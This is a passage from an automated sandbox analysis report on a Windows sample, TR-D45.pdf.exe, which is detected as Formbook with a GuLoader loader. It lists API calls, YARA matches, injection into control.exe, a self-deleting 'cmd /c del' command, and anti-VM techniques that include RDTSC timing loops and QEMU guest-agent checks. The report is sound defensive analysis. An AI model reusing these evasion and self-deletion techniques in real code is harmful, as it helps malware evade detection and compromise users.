      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9520 NtWaitForSingleObject,1_2_1E2A9520
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2AAD30 NtSetContextThread,1_2_1E2AAD30
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9560 NtWriteFile,1_2_1E2A9560
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A95F0 NtQueryInformationFile,1_2_1E2A95F0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9A10 NtQuerySection,1_2_1E2A9A10
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9A80 NtOpenDirectoryObject,1_2_1E2A9A80
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9B00 NtSetValueKey,1_2_1E2A9B00
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2AA3B0 NtGetContextThread,1_2_1E2AA3B0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9820 NtEnumerateKey,1_2_1E2A9820
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2AB040 NtSuspendThread,1_2_1E2AB040
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A98A0 NtWriteVirtualMemory,1_2_1E2A98A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A9950 NtQueueApcThread,1_2_1E2A9950
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A99D0 NtCreateProcessEx,1_2_1E2A99D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479840 NtDelayExecution,LdrInitializeThunk,12_2_04479840
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479860 NtQuerySystemInformation,LdrInitializeThunk,12_2_04479860
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479540 NtReadFile,LdrInitializeThunk,12_2_04479540
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479910 NtAdjustPrivilegesToken,LdrInitializeThunk,12_2_04479910
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044795D0 NtClose,LdrInitializeThunk,12_2_044795D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044799A0 NtCreateSection,LdrInitializeThunk,12_2_044799A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479A50 NtCreateFile,LdrInitializeThunk,12_2_04479A50
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479650 NtQueryValueKey,LdrInitializeThunk,12_2_04479650
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479660 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_04479660
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044796D0 NtCreateKey,LdrInitializeThunk,12_2_044796D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044796E0 NtFreeVirtualMemory,LdrInitializeThunk,12_2_044796E0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479710 NtQueryInformationToken,LdrInitializeThunk,12_2_04479710
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479FE0 NtCreateMutant,LdrInitializeThunk,12_2_04479FE0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479780 NtMapViewOfSection,LdrInitializeThunk,12_2_04479780
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0447B040 NtSuspendThread,12_2_0447B040
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479820 NtEnumerateKey,12_2_04479820
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044798F0 NtReadVirtualMemory,12_2_044798F0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044798A0 NtWriteVirtualMemory,12_2_044798A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479950 NtQueueApcThread,12_2_04479950
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479560 NtWriteFile,12_2_04479560
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479520 NtWaitForSingleObject,12_2_04479520
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0447AD30 NtSetContextThread,12_2_0447AD30
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044799D0 NtCreateProcessEx,12_2_044799D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044795F0 NtQueryInformationFile,12_2_044795F0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479670 NtQueryInformationProcess,12_2_04479670
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479A00 NtProtectVirtualMemory,12_2_04479A00
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479610 NtEnumerateValueKey,12_2_04479610
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479A10 NtQuerySection,12_2_04479A10
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479A20 NtResumeThread,12_2_04479A20
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479A80 NtOpenDirectoryObject,12_2_04479A80
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479760 NtOpenProcess,12_2_04479760
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479770 NtSetInformationFile,12_2_04479770
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0447A770 NtOpenThread,12_2_0447A770
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479B00 NtSetValueKey,12_2_04479B00
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0447A710 NtOpenProcessToken,12_2_0447A710
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04479730 NtQueryVirtualMemory,12_2_04479730
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044797A0 NtUnmapViewOfSection,12_2_044797A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0447A3B0 NtGetContextThread,12_2_0447A3B0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459E70 NtClose,12_2_02459E70
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459F20 NtAllocateVirtualMemory,12_2_02459F20
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459D40 NtCreateFile,12_2_02459D40
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459DF0 NtReadFile,12_2_02459DF0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459E6A NtReadFile,NtClose,12_2_02459E6A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459E9B NtClose,12_2_02459E9B
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459F1A NtAllocateVirtualMemory,12_2_02459F1A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02459D92 NtCreateFile,12_2_02459D92
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_00404E8F0_2_00404E8F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_0040568E0_2_0040568E
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E286E301_2_1E286E30
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32D6161_2_1E32D616
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E332EF71_2_1E332EF7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E331FF11_2_1E331FF1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E33DFCE1_2_1E33DFCE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27841F1_2_1E27841F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32D4661_2_1E32D466
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E260D201_2_1E260D20
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E332D071_2_1E332D07
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E331D551_2_1E331D55
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2925811_2_1E292581
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27D5E01_2_1E27D5E0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3325DD1_2_1E3325DD
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3322AE1_2_1E3322AE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E332B281_2_1E332B28
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29EBB01_2_1E29EBB0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32DBD21_2_1E32DBD2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3203DA1_2_1E3203DA
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E33E8241_2_1E33E824
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3210021_2_1E321002
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2920A01_2_1E2920A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3320A81_2_1E3320A8
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27B0901_2_1E27B090
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3328EC1_2_1E3328EC
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2841201_2_1E284120
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26F9001_2_1E26F900
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_000BD3401_2_000BD340
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FD46612_2_044FD466
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F100212_2_044F1002
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444841F12_2_0444841F
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_045028EC12_2_045028EC
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444B09012_2_0444B090
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044620A012_2_044620A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_045020A812_2_045020A8
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04501D5512_2_04501D55
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443F90012_2_0443F900
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04502D0712_2_04502D07
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04430D2012_2_04430D20
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445412012_2_04454120
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_045025DD12_2_045025DD
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444D5E012_2_0444D5E0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446258112_2_04462581
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04456E3012_2_04456E30
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04502EF712_2_04502EF7
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_045022AE12_2_045022AE
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04502B2812_2_04502B28
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FDBD212_2_044FDBD2
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04501FF112_2_04501FF1
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446EBB012_2_0446EBB0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0245D34012_2_0245D340
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02449E4012_2_02449E40
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02449E3C12_2_02449E3C
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0245CF8612_2_0245CF86
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0245DF9412_2_0245DF94
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02442FB012_2_02442FB0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02442D8712_2_02442D87
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02442D9012_2_02442D90
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: String function: 1E26B150 appears 45 times
      Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0443B150 appears 35 times
      Source: TR-D45.pdf.exe, 00000000.00000002.247663244.0000000002250000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exe, 00000000.00000000.228367580.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSBEKASSEBILER.exe vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exeBinary or memory string: OriginalFilename vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exe, 00000001.00000002.320194787.000000001E4EF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exe, 00000001.00000003.313426694.0000000000919000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exe, 00000001.00000000.246411137.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSBEKASSEBILER.exe vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exe, 00000001.00000002.319716219.000000001DDB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exe, 00000001.00000002.319651921.000000001DC60000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs TR-D45.pdf.exe
      Source: TR-D45.pdf.exeBinary or memory string: OriginalFilenameSBEKASSEBILER.exe vs TR-D45.pdf.exe
      Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.495347185.00000000026CA000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.497491783.000000000493F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@8/3
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_01
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\~DF02231C1D730B1CDB.TMPJump to behavior
      Source: TR-D45.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: TR-D45.pdf.exeVirustotal: Detection: 29%
      Source: TR-D45.pdf.exeReversingLabs: Detection: 14%
      Source: unknownProcess created: C:\Users\user\Desktop\TR-D45.pdf.exe 'C:\Users\user\Desktop\TR-D45.pdf.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\TR-D45.pdf.exe 'C:\Users\user\Desktop\TR-D45.pdf.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TR-D45.pdf.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeProcess created: C:\Users\user\Desktop\TR-D45.pdf.exe 'C:\Users\user\Desktop\TR-D45.pdf.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TR-D45.pdf.exe'Jump to behavior
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.292398447.00000000070D0000.00000002.00000001.sdmp
      Source: Binary string: control.pdb source: TR-D45.pdf.exe
      Source: Binary string: wntdll.pdbUGP source: TR-D45.pdf.exe, 00000001.00000002.319908654.000000001E240000.00000040.00000001.sdmp, control.exe, 0000000C.00000003.314263718.00000000040E0000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: TR-D45.pdf.exe, control.exe
      Source: Binary string: control.pdbUGP source: TR-D45.pdf.exe, 00000001.00000002.314034549.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.292398447.00000000070D0000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: TR-D45.pdf.exe PID: 3668, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: TR-D45.pdf.exe PID: 6060, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: TR-D45.pdf.exe PID: 3668, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: TR-D45.pdf.exe PID: 6060, type: MEMORY
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_004114BC push eax; ret 0_2_004114FB
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02395BD8 push ss; iretd 0_2_02395BE5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_0239497F push ss; iretd 0_2_02395BE5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02394954 push ss; iretd 0_2_02395BE5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023949AB push ss; iretd 0_2_02395BE5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_023949DF push ss; iretd 0_2_02395BE5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_3_0091C611 push ecx; ret 1_3_0091C624
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_3_00930BDE push ebx; iretd 1_3_00930C81
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2BD0D1 push ecx; ret 1_2_1E2BD0E4
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_000B7811 push cs; retf 1_2_000B7819
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_000BDA6C push edi; ret 1_2_000BDA6E
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0448D0D1 push ecx; ret 12_2_0448D0E4
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0245DA6C push edi; ret 12_2_0245DA6E
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_024563C0 pushad ; retf 12_2_02456460
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02457811 push cs; retf 12_2_02457819
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0245CEE2 push eax; ret 12_2_0245CEE8
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0245CEEB push eax; ret 12_2_0245CF52
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0245CE95 push eax; ret 12_2_0245CEE8
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0245CF4C push eax; ret 12_2_0245CF52
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_02456437 pushad ; retf 12_2_02456460
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0245E4B2 push cs; retf 12_2_0245E4B3

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xEB
      Uses an obfuscated file name to hide its real file extension (double extension)Show sources
      Source: Possible double extension: pdf.exeStatic PE information: TR-D45.pdf.exe
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02390A92 NtSetInformationThread,TerminateProcess,0_2_02390A92
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02390BAE TerminateProcess,0_2_02390BAE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02390AC7 TerminateProcess,0_2_02390AC7
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02390B37 TerminateProcess,0_2_02390B37
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02390B9C TerminateProcess,0_2_02390B9C
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02390B83 TerminateProcess,0_2_02390B83
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02390BD3 TerminateProcess,0_2_02390BD3
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02390C27 TerminateProcess,0_2_02390C27
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 0_2_02390C67 TerminateProcess,0_2_02390C67
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeRDTSC instruction interceptor: First address: 00000000023980C6 second address: 00000000023980C6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FF010BA7BE8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f fnop 0x00000021 add edi, edx 0x00000023 dec dword ptr [ebp+000000F8h] 0x00000029 jmp 00007FF010BA7C0Eh 0x0000002b cmp ecx, BDD4905Dh 0x00000031 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000038 jne 00007FF010BA7B93h 0x0000003a cmp bx, bx 0x0000003d call 00007FF010BA7C42h 0x00000042 call 00007FF010BA7BFAh 0x00000047 lfence 0x0000004a mov edx, dword ptr [7FFE0014h] 0x00000050 lfence 0x00000053 ret 0x00000054 mov esi, edx 0x00000056 pushad 0x00000057 rdtsc
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: TR-D45.pdf.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeRDTSC instruction interceptor: First address: 00000000023980C6 second address: 00000000023980C6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FF010BA7BE8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f fnop 0x00000021 add edi, edx 0x00000023 dec dword ptr [ebp+000000F8h] 0x00000029 jmp 00007FF010BA7C0Eh 0x0000002b cmp ecx, BDD4905Dh 0x00000031 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000038 jne 00007FF010BA7B93h 0x0000003a cmp bx, bx 0x0000003d call 00007FF010BA7C42h 0x00000042 call 00007FF010BA7BFAh 0x00000047 lfence 0x0000004a mov edx, dword ptr [7FFE0014h] 0x00000050 lfence 0x00000053 ret 0x00000054 mov esi, edx 0x00000056 pushad 0x00000057 rdtsc
